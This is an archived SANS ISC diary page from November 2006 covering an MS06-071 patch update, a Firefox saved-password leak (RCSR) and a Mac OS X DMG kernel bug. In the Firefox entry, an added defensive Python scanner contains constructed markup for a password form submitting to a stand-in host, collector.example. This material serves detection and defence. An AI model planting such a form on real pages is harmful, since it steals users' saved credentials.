
SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2006-11-22 InfoSec Handlers Diary Blog



MS06-071 is available via SUS 1.0

Published: 2006-11-22
Last Updated: 2006-11-22 19:47:38 UTC
by Adrien de Beaupre (Version: 1)
The MS06-071 patch should now be available on SUS 1.0 servers for approval. Reader Andrew reports having seen MSXML 4.0 SP2 Security Update (KB927978), 11/17/2006 and MSXML 6.0 RTM Security Update (KB927977), 11/17/2006 show up. The Microsoft Security Response Center Blog made the announcement here.
Microsoft have also announced that support for SUS 1.0 will be further extended until Patch Tuesday July 10, 2007. The announcement appears on the main SUS page. MS06-071 not being available for SUS 1.0 when it was released was also discussed on the Microsoft blog, as well as the SUS drop dead date extension.

Cheers,
Adrien de Beaupre

Reverse Cross-Site Request (RCSR) vulnerability

Published: 2006-11-22
Last Updated: 2006-11-22 14:43:18 UTC
by Adrien de Beaupre (Version: 1)
A new vulnerability in Firefox has recently been disclosed. The password saving functionality of Firefox can be exploited to expose usernames and passwords to other sites, such as those used for blogs or any page requesting user input. The proof of concept page shows the username and password input in a Google URL. They are calling it a Reverse Cross-Site Request (RCSR) vulnerability. The advisory appears here. This type of attack vector also appears to affect Internet Explorer.

Bugzilla link.

Mozilla has apparently been advised of the vulnerability; there is currently no vendor patch. The workaround in this particular case would be to never use Firefox to save passwords for any web site. The option is under Tools, Options, Security. Here is a link showing how to disable it.
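For operators of sites that accept user-contributed HTML, a server-side check can complement the browser workaround. The following is an added example, not code from the diary or the advisory: it assumes the exposure relies on a form containing a password field that is placed in user-supplied markup and submits to a different host, and it reports such forms. The function name, host names and sample markup are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class _FormScanner(HTMLParser):
    """Records each <form> and whether it contains a password input."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.forms = []      # entries: [action, method, has_password]
        self._open = None    # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._open = [a.get("action", ""), a.get("method", "get").lower(), False]
            self.forms.append(self._open)
        elif tag == "input" and a.get("type", "text").lower() == "password":
            if self._open is not None:   # inputs outside a form are ignored here
                self._open[2] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None


def find_credential_forms(html, page_url):
    """Return one finding per form with a password field in user-supplied html."""
    scanner = _FormScanner()
    scanner.feed(html)
    scanner.close()
    page_host = urlparse(page_url).hostname
    findings = []
    for action, method, has_password in scanner.forms:
        if not has_password:
            continue
        target = urljoin(page_url, action.strip())   # empty action -> the page itself
        findings.append({"action": target, "method": method,
                         "off_site": urlparse(target).hostname != page_host})
    return findings


# Constructed sample: comment markup submitted to a hypothetical blog.
SAMPLE_PAGE_URL = "https://blog.example/post/42"
SAMPLE_COMMENTS = """<p>Nice post!</p>
<form action="//collector.example/search" method="GET">
  <input name="q" type="text"><input name="p" type="PASSWORD"></form>
<form action="/search"><input name="q"></form>
<form action="/login" method="post"><input type="password" name="pw"></form>"""
```

Any finding in user-contributed content is a reason to reject or strip the markup; an `off_site` finding with method `get` matches the pattern where the credentials end up in another site's URL.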

Thanks to our reader Carsten for letting us know.

Cheers,
Adrien de Beaupre

Mac OS X Apple UDIF Disk Image Kernel Memory Corruption

Published: 2006-11-22
Last Updated: 2006-11-22 03:57:39 UTC
by Adrien de Beaupre (Version: 1)
A vulnerability has been reported in the way OS X handles corrupt DMG images. This would typically be a local user exploit for privilege escalation. The exception here would be that it could also be exploited remotely via the Safari web browser. A lot of OS X binaries can arrive as DMG files. They are complete file systems, and are automounted in a default configuration. A corrupted DMG file would then compromise the system and allow for arbitrary code execution. This new vulnerability and the PoC are brought to you by the Month of Kernel Bugs (MoKB) and the number 10.

Mitigation: There is currently no vendor patch for this vulnerability. To reduce the risk of remote compromise, reconfigure Safari and be careful with DMG files from untrusted or unknown sources. For Safari, disable opening "safe" files after downloading. A tutorial on how and why to do so can be found here.

The Secunia advisory can be found here.

Cheers,
Adrien de Beaupre
